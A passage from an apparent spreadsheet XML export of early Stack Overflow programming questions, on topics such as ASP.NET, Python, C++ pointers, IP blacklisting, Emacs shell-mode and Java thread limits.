&lt;p&gt;So, I put it to you, database gurus of Stackoverflow.  What would you do in this situation?&lt;/p&gt;
&lt;p&gt;EDIT: Thank you everyone for your input!  It's given me a lot to think about.  For one, I'm going to use an ORM next time I start a project like this. =)  For two, since I'm not right now, I'll bite the four bytes and use two fields.&lt;/p&gt;
&lt;p&gt;Thanks everyone again!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling a ASP Page thru it Class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Like in Windows Forms:&lt;/p&gt;
&lt;p&gt;Dim myForm as New AForm(Constr-arg1, Constr-arg2)&lt;/p&gt;
&lt;p&gt;myForm.Show&lt;/p&gt;
&lt;p&gt;... is there a similar way to Load a Page in ASP.Net. I would like to overload the Page Constructor and instantiate the correct Page Contructor depending on the situation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the statistics of HTML vs. Text email usage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What the latest figures are on people viewing their emails in text only mode vs. HTML?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Html_email" rel="nofollow"&gt;Wikipedia&lt;/a&gt; and it's &lt;a href="http://www.emaillabs.com/tools/email-marketing-statistics.html" rel="nofollow"&gt;source&lt;/a&gt; both seem to reference &lt;a href="http://www.dmnews.com/Outlook-2006-More-Technology-More-Targeting/article/90305/" rel="nofollow"&gt;this&lt;/a&gt; research from 2006 which is an eternity ago in internet terms.&lt;/p&gt;
&lt;p&gt;An issue with combining both HTML and text based emails is taking a disproportionate amount of time to resolve given the likely number of users it is affecting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python - When to use file vs open</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the difference between file and open in Python?  When should I use which one?  (Say I'm in 2.5)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic IP-based blacklisting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Folks, we all know that IP blacklisting doesn't work - spammers can come in through a proxy, plus, legitimate users might get affected... That said, blacklisting seems to me to be an efficient mechanism to stop a persistent attacker, given that the actual list of IP's is determined dynamically, based on application's feedback and user behavior. &lt;/p&gt;
&lt;p&gt;For example:
- someone trying to brute-force your login screen
- a poorly written bot issues very strange HTTP requests to your site
- a script-kiddie uses a scanner to look for vulnerabilities in your app&lt;/p&gt;
&lt;p&gt;I'm wondering if the following mechanism would work, and if so, do you know if there are any tools that do it: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In a web application, developer has a hook to report an "offense". An offense can be minor (invalid password) and it would take dozens of such offenses to get blacklisted; or it can be major, and a couple of such offenses in a 24-hour period kicks you out. &lt;/li&gt;
&lt;li&gt;Some form of a web-server-level block kicks in on before every page is loaded, and determines if the user comes from a "bad" IP. &lt;/li&gt;
&lt;li&gt;There's a "forgiveness" mechanism built-in: offenses no longer count against an IP after a while.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Extra note: it'd be awesome if the solution worked in PHP, but I'd love to hear your thoughts about the approach in general, for any language/platform&lt;/b&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the cost of using a pointer to member function vs. a switch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following situation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
class A
{
public:
    A(int whichFoo);
    int foo1();
    int foo2();
    int foo3();
    int callFoo(); // cals one of the foo's depending on the value of whichFoo
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my current implementation I save the value of &lt;code&gt;whichFoo&lt;/code&gt; in a data member in the constructor and use a &lt;code&gt;switch&lt;/code&gt; in &lt;code&gt;callFoo()&lt;/code&gt; to decide which of the foo's to call.  Alternatively, I can use a &lt;code&gt;switch&lt;/code&gt; in the constructor to save a pointer to the right &lt;code&gt;fooN()&lt;/code&gt; to be called in &lt;code&gt;callFoo()&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;My question is which way is more efficient if an object of class A is only constructed once, while &lt;code&gt;callFoo()&lt;/code&gt; is called a very large number of times.  So in the first case we have multiple executions of a switch statement, while in the second there is only one switch, and multiple calls of a member function using the pointer to it.  I know that calling a member function using a pointer is slower than just calling it directly.  Does anybody know if this overhead is more or less than the cost of a &lt;code&gt;switch&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Clarification:  I realize that you never really know which approach gives better performance until you try it and time it.  However, in this case I already have approach 1 implemented, and I wanted to find out if approach 2 can be more efficient at least in principle.  It appears that it can be, and now it makes sense for me to bother to implement it and try it.  &lt;/p&gt;
&lt;p&gt;Oh, and I also like approach 2 better for aesthetic reasons.  I guess I am looking for a justification to implement it. :) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the Python equivalents of the sighold and sigrelse functions found in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It appears the Python signal module doesn't have anything similar to the sighold and sigrelse functions found in C, using signal.h. Are there Python equivalents of &lt;em&gt;any&lt;/em&gt; sort?&lt;/p&gt;
&lt;p&gt;Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Displaying code in blog posts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What libraries and/or packages have you used to create blog posts with code blocks? Having a JavaScript library that would support line numbers and  indentation is ideal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which CSS tag creates a box like this with title?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a box like this with title:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.stack.imgur.com/2rip1.gif" alt="CSS box with title"&gt;&lt;/p&gt;
&lt;p&gt;Can any one please let me know if there is a default CSS tag to do this? Or do I need to create my custom style?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I run a script when ip-address changes (most likely using a dhclient hook) on a (Ubuntu) Linux machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a script which contacts a few sources and tell them "the IP-address XXX.XXX.XXX.XXX is my current one". My test web server has a dynamic IP-address through DHCP and amongst other things it needs to update a DDNS entry when its IP-address changes. However it's not the only thing it does, so I will need to run my own custom script.&lt;/p&gt;
&lt;p&gt;I suspect that this is possible by a attaching the script to be run for a given dhclient hook. However I still need to know which hook I should use, and how.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I cancel a text selection after the initial mousedown event?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement a pop-up menu based on a click-and-hold, positioned so that a (really) slow click will still trigger the default action, and with the delay set so that a text-selection gesture won't usually trigger the menu.  &lt;/p&gt;
&lt;p&gt;What I can't seem to do is cancel the text-selection in a way that doesn't prevent text-selection in the first place: returning false from the event handler (or calling &lt;code&gt;$(this).preventDefault()&lt;/code&gt;) prevents the user from selecting at all, and the obvious &lt;code&gt;$().trigger('mouseup')&lt;/code&gt; doesn't doesn't do anything with the selection at all.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This is in the general context of a page, not particular to a textarea or other text field.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;e.stopPropogation()&lt;/code&gt; doesn't cancel text-selection.&lt;/li&gt;
&lt;li&gt;I'm not looking to &lt;em&gt;prevent&lt;/em&gt; text selections, but rather to &lt;em&gt;veto&lt;/em&gt; them after some short period of time, if certain conditions are met.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Javascript curry - what are the practical applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't think I've grokked currying yet. I understand what it does, and how to do it. I just can't think of a situation I would use it.&lt;/p&gt;
&lt;p&gt;Where are you using currying in javascript (or where are the main libraries using it)? DOM manipulation or general application development examples welcome.&lt;/p&gt;
&lt;p&gt;EDIT: &lt;a href="http://stackoverflow.com/questions/113780/javascript-curry-what-are-the-practical-applications#113799"&gt;One of the answers&lt;/a&gt; mentions animation. Functions like "slideUp", "fadeIn" take an element as an arguments and are normally a curried function returning the high order function with the default "animation function" built-in. Why is that better than just applying the higher-up function with some defaults?&lt;/p&gt;
&lt;p&gt;Oh and are there any drawbacks to using it?&lt;/p&gt;
&lt;p&gt;Cheers.&lt;/p&gt;
&lt;p&gt;EDIT: As requested here are some good resources on javascript currying:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.dustindiaz.com/javascript-curry/"&gt;http://www.dustindiaz.com/javascript-curry/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Crockford, Douglas (2008) &lt;em&gt;Javascript: The Good Parts&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.crockford.com/javascript/www_svendtofte_com/code/curried_javascript/index.html"&gt;http://www.svendtofte.com/code/curried_javascript/&lt;/a&gt;
(Takes a detour into ML so skip the whole section from "A crash course in ML" and start again at "How to write curried JavaScript")&lt;/li&gt;
&lt;li&gt;&lt;a href="http://blog.morrisjohns.com/javascript_closures_for_dummies"&gt;http://blog.morrisjohns.com/javascript_closures_for_dummies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/111102/how-does-a-javascript-closure-work"&gt;How do JavaScript closures work?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href="http://ejohn.org/blog/partial-functions-in-javascript/"&gt;http://ejohn.org/blog/partial-functions-in-javascript&lt;/a&gt; (Mr. Resig on the money as per usual)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://benalman.com/news/2010/09/partial-application-in-javascript/"&gt;http://benalman.com/news/2010/09/partial-application-in-javascript/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'll add more as they crop up in the comments.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Thanks for the answers.&lt;/p&gt;
&lt;p&gt;So currying and partial application in general are convenience techniques.&lt;/p&gt;
&lt;p&gt;If you are frequently "refining" a high-level function by calling it with same configuration, you can curry (or use Resig's partial) the higher-level function to create simple, concise helper methods.&lt;/p&gt;
&lt;p&gt;Cheers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Performance penalty for working with interfaces in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a runtime performance penalty when using interfaces (abstract base classes) in C++?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if an OLEDB driver is installed on the system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I make sure that a certain OLEDB driver is installed when I start my application? I use ADO from Delphi and would like to display a descriptive error message if the driver is missing. The error that's returned from ADO isn't always that user-friendly.&lt;/p&gt;
&lt;p&gt;There are probably a nice little function that returns all installed drivers but I haven't found it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get Performance Counter Instance Name (w3wp#XX) from ASP.NET worker process ID</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to display some memory statistics (working set, GCs etc.) on a web page using the .NET/Process performance counters. Unfortunately, if there are multiple application pools on that server, they are differentiated using an index (#1, #2 etc.) but I don't know how to match a process ID (which I have) to that #xx index. Is there a programmatic way (from an ASP.NET web page)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create anonymous object by Reflection in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to create C# 3.0 anonymous object via Reflection at runtime in .NET 3.5? I'd like to support them in my serialization scheme, so I need a way to manipulate them programmatically.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;edited later to clarify the use case&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;An extra constraint is that I will be running all of it inside a Silverlight app, so extra runtimes are not an option, and not sure how generating code on the fly will work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pointer vs. Reference</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be better practice when giving a function the original variable to work with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;unsigned long x = 4;
void func1(unsigned long&amp;amp; val) {
     val = 5;            
}
func1(x);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void func2(unsigned long* val) {
     *val = 5;
}
func2(&amp;amp;x);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;IOW: Is there any reason to pick one over another?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I share a variable value between classic asp, .NET and javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created an &lt;code&gt;IHttpHandler&lt;/code&gt; in .NET C# which returns pieces of html to a classic asp page.&lt;/p&gt;
&lt;p&gt;The classic asp page communicates with the &lt;code&gt;IHttpHandler&lt;/code&gt; through basic http requests using &lt;code&gt;ServerXMLHTTP&lt;/code&gt; in vbscript or Ajax Calls in JavaScript.&lt;/p&gt;
&lt;p&gt;Now, I need a way to share a variable which I have in vbscript but not in javascript with the .NET application.&lt;/p&gt;
&lt;p&gt;The first bit, sharing a variable between classic asp and .net is not a problem as I can just add it onto the http request. Because the variable is not available in javascript however I can't do this in that case.&lt;/p&gt;
&lt;p&gt;I had the idea that I could maybe cache the variable in the .NET application and use the cached version for javascript calls. But for this to work I would need a way to uniquely identify the "client" in .NET...&lt;/p&gt;
&lt;p&gt;I tried to add &lt;code&gt;System.Web.SessionState.IRequiresSessionState&lt;/code&gt; to my HttpHandler and use the SessionId but this didn't work because every single call to the HttpHandler seems to get a new ID.&lt;/p&gt;
&lt;p&gt;Am I thinking the right way? What are my options here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating Custom GnuCash Reports with Scheme</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any resources which show how to create custom GnuCash reports? I don't know the intricacies of Scheme but I do know the basics of Lisp, based on tinkering with Emacs. Is there a site which lays out the API for GnuCash reports, ideally with a little explanation of Scheme as well?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple web "live chat" software (LAMP stack) that integrates with Jabber/Aim</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've looked for this a few times in the past, to no avail. I would like a simple &lt;code&gt;php/ajax&lt;/code&gt; web chat interface, that, and this is the critical part, will interface with my &lt;code&gt;IM client (Pidgin)&lt;/code&gt; ... via Jabber or Aim. &lt;code&gt;Plugoo&lt;/code&gt; is almost what I want, except it is hosted, and flash based. Flash-based would be OK if not ideal, but hosted isn't. &lt;/p&gt;
&lt;p&gt;Note that I don't just need notifications, but I want a user of the website who clicks "live chat" to get a chat interface and my IM client allows me to interact with them. &lt;/p&gt;
&lt;p&gt;This is super handy for those of us that want to provide live support to clients who do not use IM. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a Python dictionary an example of a hash table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the basic data structures in Python is the dictionary, which allows one to record "keys" for looking up "values" of any type.  Is this implemented internally as a hash table?  If not, what is it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to pack JavaScript code without getting perfomance flaws?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am searching for a way to compress JavaScript code for the iPhone. Is there a way to avoid  using a lot of CPU time on the small and rather slow device?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass an array parameter in TOAD</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using toad and an oracle database, how can I call a sp and see the results by passing an array to one of the parameters of the sp?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you verify the Work and Experience level of Consultants?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, right now I am hunting for consultants for two technologies I have knowledge about but no experience in. I have put ads on Craigslist as these are two small tasks and most likely the larger firms wont want to be bothered and will charge an arm and a leg. &lt;/p&gt;
&lt;p&gt;How do I verify that these guys are on the up and up? That the work they are sending me is THEIRS? I mean, I'd love to believe that the guy that didn't sign his email did all the flash work for Guess.com and is trolling Craigslist for gigs, I just don't think it's likely. &lt;/p&gt;
&lt;p&gt;I also don't have much time for this, so anything I can do will have to be fast (thus the reason I am hiring consultants). &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The problem is, this is a small company, and I AM the IT department. I mean, I know enough about Flash to ask some high level questions, but not much. The other thing is a Mac product called File Maker Pro, which I know relatively nothing about. &lt;/p&gt;
&lt;p&gt;The point of this is to save me time so I don't have to learn the technologies and do it. Are there reputable firms that handle small things like this? I suppose that may have been a better question. &lt;/p&gt;
&lt;p&gt;Thank you. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I trigger Core Animation on an animator proxy during a call to resizeSubviewsWithOldSize?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some NSViews that I'm putting in one of two layouts depending on the size of my window.&lt;/p&gt;
&lt;p&gt;I'm adjusting the layout when the relevant superview receives the resizeSubviewsWithOldSize method.&lt;/p&gt;
&lt;p&gt;This works, but I'd like to animate the change.  So naturally I tried calling the animator proxy when I set the new frames, but the animation won't run while the user is still dragging.  If I release the mouse before the animation is scheduled to be done I can see the tail end of the animation, but nothing until then.   I tried making sure kCATransactionDisableActions was set to NO, but that didn't help.&lt;/p&gt;
&lt;p&gt;Is it possible to start a new animation and actually have it run during the resize?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC Preview 5 - Rendering A View To String For Testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading a post by Brad Wilson (&lt;a href="http://bradwilson.typepad.com/blog/2008/08/partial-renderi.html"&gt;http://bradwilson.typepad.com/blog/2008/08/partial-renderi.html&lt;/a&gt;) on the new ViewEngine changes to MVC Preview 5 and thought that it would be great to be able to render a view to string for use in tests. I get the impression from the article that it may be possible to achieve this but cannot figure out how. &lt;/p&gt;
&lt;p&gt;I believe this would enable us to do away with some of our WatIn tests (which are slow and unreliable) as it would allow us to check that the View has rendered correctly by simply checking the string for expected values/text.&lt;/p&gt;
&lt;p&gt;Has anyone implemented something like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check whether a file is valid UTF-8?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm processing some data files that are supposed to be valid UTF-8 but aren't, which causes the parser (not under my control) to fail. I'd like to add a stage of pre-validating the data for UTF-8 well-formedness, but I've not yet found a utility to help do this.&lt;/p&gt;
&lt;p&gt;There's a &lt;a href="http://www.w3.org/2005/01/yacker/uploads/utf8-validator" rel="nofollow"&gt;web service&lt;/a&gt; at W3C which appears to be dead, and I've found a Windows-only validation &lt;a href="http://bolek.techno.cz/UTF8-Validator/" rel="nofollow"&gt;tool&lt;/a&gt; that reports invalid UTF-8 files but doesn't report which lines/characters to fix.&lt;/p&gt;
&lt;p&gt;I'd be happy with either a tool I can drop in and use (ideally cross-platform), or a ruby/perl script I can make part of my data loading process. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex profiler gives "Socket timeout " error. Why for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When trying to run the Flex Builder 3 profiler on any I don't get the profiler dialog window and then after a few seconds I get "Socket timeout" in the console window.  Any ideas why it can't connect?&lt;/p&gt;
&lt;p&gt;I've got the latest debug version of Flash player and have tried shutting off my firewall.&lt;br /&gt;
I'm running it on XP from the local drive, ie. not through localhost.&lt;/p&gt;
&lt;p&gt;Thanks,
Alex&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you specify a port range for Java sockets?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Java you can give the number zero as a single parameter for the Socket or DatagramSocket constructor. Java binds that Socket to a free port then. Is it possible to limit the port lookup to a specific range?&lt;/p&gt;
&lt;p&gt;Thanks in advance,&lt;br /&gt;
Roland&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In P4V, how do I create a branch from a label?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company just imported our CVS repository into Perforce. I'm new to P4V and I can't work out how to create a branch from an existing label. Can anyone tell me how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to clear a user's brower of my page, or say not to use cache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a command in classic ASP I can use to tell the browser not to pull the page from it's cache, or, to not cache, or clear the cache of my page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Eclipse, why does "Build Automatically" get mysteriously disabled?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running Eclipse Europa (3.3).  I leave the "Build Automatically" setting, under the Project menu, on all the time.  Once in awhile my code isn't compiling, and I puzzle over it and then pull down the Project menu ... lo and behold, it's not set anymore.  What gives?  Is this a bug, or is there something else I'm doing that could cause it?&lt;/p&gt;
&lt;p&gt;Edit:  I am running the regular Java developer installation, plus Subversive and its connectors, Jetty Launcher, and I believe no other plugins.  Other people at my workplace have had the same problem.&lt;/p&gt;
&lt;p&gt;Edit:  I am still having this problem once in a blue moon, only now I'm using Eclipse Galileo (3.5) for Windows.  I haven't had this problem in Galileo for OS X, neither in Cocoa nor Carbon, but I have not used that for as long.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What pre-existing services exist for calculating distance between two addresses?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to implement a way to display a list of stored addresses sorted by proximity to a given address.&lt;/p&gt;
&lt;p&gt;Addresses in the list will be stored in a database table.  Separate parts have separate fields (we have fields for postal code, city name, etc.) so it is not just a giant &lt;code&gt;varchar&lt;/code&gt;.  These are user-entered and due to the nature of the system may not always be complete (some may be missing postal code and others may have little more than city and state).&lt;/p&gt;
&lt;p&gt;Though this is for an intranet application I have no problems using outside resources including accessing internet web services and such.  I'd actually prefer that over rolling my own unless it would be trivial to do myself.  If Google or Yahoo! already provides a free service, I'm more than willing to check it out.  The keyword is it must be free, as I'm not at liberty to introduce any additional cost onto this project for this feature as it is already a bonus "perk" so to speak.&lt;/p&gt;
&lt;p&gt;I'm thinking of this much like many brick &amp;amp; mortar shops do their "Find a Location" feature.  Showing it in a simple table sorted appropriately and displaying distance (in, say, miles) is great.  Showing a map mash-up is even cooler, but I can definitely live with just getting the distance back and me handling all of the subsequent display and sorting.&lt;/p&gt;
&lt;p&gt;The problem with simple distance algorithms is the nature of the data.  Since all or part of the address can be undefined, I don't have anything convenient like lat/long coords.  Also, even if I make postal codes required, 90% of the addresses will probably have the same five postal codes.&lt;/p&gt;
&lt;p&gt;While it need not be blisteringly fast, anything that takes more than seven seconds to show up on the page due to latency might be too long for the average user to wait, as we know.  If such a hypothetical service supports sending a batch of addresses at once instead of querying one at a time, that'd be great.  Still, I should not think the list of addresses would exceed 50 total, if that many.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bad UI Design? Having two logos on the top left of the website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Well i am currently working on a project doing some UI mockups when certain users wanted to have two logo on the top left ot the website.
One is to indicate what is the website about then another is to indicate that this website is actually belong to this particular sector.&lt;/p&gt;
&lt;p&gt;I thought that UI design wise this is very bad because two logos on top left. If users go in initially he won't be able to know which logo means what.&lt;/p&gt;
&lt;p&gt;What are your opinions regarding this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Location of My Pictures</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I programatically (Using C#) find out what the path is of my My Pictures folder? &lt;/p&gt;
&lt;p&gt;Does this work on XP and Vista?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I kill a process using Vb.NET or C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a scenario where I have to check whether user has already opened Microsoft Word.  If he has, then I have to kill the winword.exe process and continue to execute my code. &lt;/p&gt;
&lt;p&gt;Does any one have any straight-forward code for killing a process using vb.net or c#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using AssemblyInfo to automatically update multiple AssemblyInfo.cs files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got several AssemblyInfo.cs files as part of many projects in a single solution that I'm building automatically as part of TeamCity.&lt;/p&gt;
&lt;p&gt;To make the msbuild script more maintainable I'd like to be able to use the AssemblyInfo community task in conjunction with an ItemGroup e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ItemGroup&amp;gt;
     &amp;lt;AllAssemblyInfos Include="..\**\AssemblyInfo.cs" /&amp;gt;
&amp;lt;/ItemGroup&amp;gt;
&amp;lt;AssemblyInfo AssemblyTitle="" AssemblyProduct="$(Product)" AssemblyCompany="$(Company)" AssemblyCopyright="$(Copyright)" 
				  ComVisible="false" CLSCompliant="false" CodeLanguage="CS" AssemblyDescription="$(Revision)$(BranchName)" 
				  AssemblyVersion="$(FullVersion)" AssemblyFileVersion="$(FullVersion)" OutputFile="@(AllAssemblyInfos)" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which blatently doesn't work because OutputFile cannot be a referenced ItemGroup.&lt;/p&gt;
&lt;p&gt;Anyone know how to make this work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open an Emacs buffer when a command tries to open an editor in shell-mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like to use Emacs' shell mode, but it has a few deficiencies. One of those is that it's not smart enough to open a new buffer when a shell command tries to invoke an editor. For example with the environment variable &lt;code&gt;VISUAL&lt;/code&gt; set to &lt;code&gt;vim&lt;/code&gt; I get the following from &lt;code&gt;svn propedit&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;
$ svn propedit svn:externals . 
"svn-prop.tmp" 2L, 149C[1;1H
~                                                                               [4;1H~                                                                               [5;1H~                                                                               [6;1H~                                                                               [7;1H~            
...
&lt;/pre&gt;
&lt;p&gt;(It may be hard to tell from the representation, but it's a horrible, ugly mess.)&lt;/p&gt;
&lt;p&gt;With &lt;code&gt;VISUAL&lt;/code&gt; set to &lt;code&gt;"emacs -nw"&lt;/code&gt;, I get&lt;/p&gt;
&lt;pre&gt;
$ svn propedit svn:externals .
emacs: Terminal type "dumb" is not powerful enough to run Emacs.
It lacks the ability to position the cursor.
If that is not the actual type of terminal you have,
use the Bourne shell command `TERM=... export TERM' (C-shell:
`setenv TERM ...') to specify the correct type.  It may be necessary
to do `unset TERMINFO' (C-shell: `unsetenv TERMINFO') as well.svn: system('emacs -nw svn-prop.tmp') returned 256
&lt;/pre&gt;
&lt;p&gt;(It works with &lt;code&gt;VISUAL&lt;/code&gt; set to just &lt;code&gt;emacs&lt;/code&gt;, but only from inside an Emacs X window, not inside  a terminal session.)&lt;/p&gt;
&lt;p&gt;Is there a way to get shell mode to do the right thing here and open up a new buffer on behalf of the command line process?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySpace DOM?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been given the task of doing some work customizing an artist's space in MySpace. It seems that you sort of hack the HTML you want into your edit profile page (which has several empty boxes). The MySpace page, it seems, is already HTML so you can only hack into that. Suggested "tweaks" include incomplete HTML code (e.g., a &lt;code&gt;&amp;lt;DIV&amp;gt;&lt;/code&gt; tag without a &lt;code&gt;&amp;lt;/DIV&amp;gt;&lt;/code&gt; tag to supress certain sections) and stylesheet pieces that you can "place anywhere" (meaning somewhere on your edit profile page). And the best one is that sites that offer layouts say, "Layout Code - Copy and Paste the code at the bottom of your 'I'd Like to Meet' Section!"&lt;/p&gt;
&lt;p&gt;This cannot possibly be this lame, can it?&lt;/p&gt;
&lt;p&gt;Is there any coherent guide to customizing MySpace pages for programmers/HTML designers? Is there a coherent DOM (including things like &lt;code&gt;.contactTable&lt;/code&gt; etc.)? Could it be that all the tweaks are just hacks people have figured out from looking at the generated HTML?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hiding Subreports in SQL Report (RDL)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch a reports that are printed out and mailed to clients. At the top of the report is the return address, left aligned. I was asked to add an optional logo to the report. This logo should be left of the return address. (The logo and all other info is stored in the database). So if the logo exists, you SHOULD see:&lt;/p&gt;
&lt;p&gt;&amp;lt;someimage&amp;gt; &amp;lt;Return Address&amp;gt;&lt;/p&gt;
&lt;p&gt;And if no logo exists, you SHOULD see:&lt;/p&gt;
&lt;p&gt;&amp;lt;Return Address&amp;gt;&lt;/p&gt;
&lt;p&gt;There are many different logos possible placed in many different reports, so to make life easier, the logo was implemented as a subreport. The subreport just grabs the correct logo image, and then it automatically displays in the report.&lt;/p&gt;
&lt;p&gt;The problem I'm having is this. If the log DOES NOT exist, then we want the return address left aligned, as shown above. But what is happening is that while the subreport shows nothing, it still takes up the space where the logo WOULD be, and the return address is floating a few inches to the right of the left side of the page.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;           &amp;lt;Return Address&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SO... is there a setting I can use/set to get the subreport to either not show, or not take up any space, if there is no logo to be displayed?&lt;/p&gt;
&lt;p&gt;Sorry, hope I made this clear enough. I'm totally new to RDL's.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Low Java single process thread limit in Red Hat Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm experiencing an issue on a test machine running Red Hat Linux (kernel version is 2.4.21-37.ELsmp) using Java 1.6 (1.6.0_02 or 1.6.0_04). The problem is, once a certain number of threads are created in a single thread group, the operating system is unwilling or unable to create any more.&lt;/p&gt;
